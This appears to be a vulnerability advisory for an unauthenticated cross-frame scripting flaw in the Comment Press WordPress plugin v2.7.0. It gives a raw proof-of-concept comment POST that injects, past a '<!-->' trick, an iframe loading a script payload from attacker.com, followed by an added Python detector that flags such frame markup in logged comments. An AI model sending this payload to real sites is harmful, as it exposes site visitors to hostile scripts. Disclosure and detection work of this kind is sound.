An Unauthenticated Cross-Frame Scripting vulnerability was discovered in the Comment Press plugin v2.7.0 for WordPress.
[!] :: PoC (Burp Suite):

POST /wp-comments-post.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 229
Origin: https://example.com.com
Referer: https://example.com.com/?post_id=8%27&comments=13%27&get=60%27&order=DESC

author=Ex.Mi&email=poc%40exmi.xss&comment=%3C!--%3E%3Ciframe%20src%3D%2F%2Fattacker.com%2Fpayload%2Fxfsii.html%20sandbox%3Dallow-scripts%3E%3C%2Fiframe%3E&name=username&nombre=&form-saic=&comment_post_ID=13&comment_parent=0
Ex.Mi
Ex.Mi
Yes
2020-10-15 (about 2 years ago)
2020-10-15 (about 2 years ago)
2020-10-17 (about 2 years ago)
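
A check a site operator could run over logged comment submissions to spot frame markup like that in the PoC request. This is an added example, not part of the original advisory or the plugin's code; the function names frame_embeds and is_external are hypothetical, and the benign body is constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Elements that load another document into the page; a text comment needs none.
FRAME_TAG = re.compile(r"<(iframe|frame|object|embed)\b([^>]*)", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\b(?:src|data)\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)

# Request body copied from the PoC above.
POC_BODY = ("author=Ex.Mi&email=poc%40exmi.xss&comment=%3C!--%3E%3Ciframe%20src%3D"
            "%2F%2Fattacker.com%2Fpayload%2Fxfsii.html%20sandbox%3Dallow-scripts%3E"
            "%3C%2Fiframe%3E&name=username&nombre=&form-saic=&comment_post_ID=13"
            "&comment_parent=0")
# Constructed benign submission for comparison.
BENIGN_BODY = ("author=Reader&email=r%40example.com&comment=Nice+post%21"
               "&comment_post_ID=13&comment_parent=0")


def frame_embeds(form_body, field="comment"):
    """Return (tag, source) pairs for frame-like elements in one form field.

    The decoded text is scanned without tracking HTML comment state, because
    browsers parse "<!-->" as an empty, already closed comment and render
    the markup that follows it.
    """
    hits = []
    for value in parse_qs(form_body, keep_blank_values=True).get(field, []):
        for tag, attrs in FRAME_TAG.findall(value):
            src = SRC_ATTR.search(attrs)
            hits.append((tag.lower(), src.group(1) if src else ""))
    return hits


def is_external(src, site_host):
    """True when a frame source names a host other than the site itself."""
    host = urlsplit(src).hostname  # None for relative paths
    return host is not None and host != site_host.lower()


if __name__ == "__main__":
    for label, body in (("PoC", POC_BODY), ("benign", BENIGN_BODY)):
        for tag, src in frame_embeds(body):
            print(label, tag, src, "external" if is_external(src, "example.com") else "local")
```
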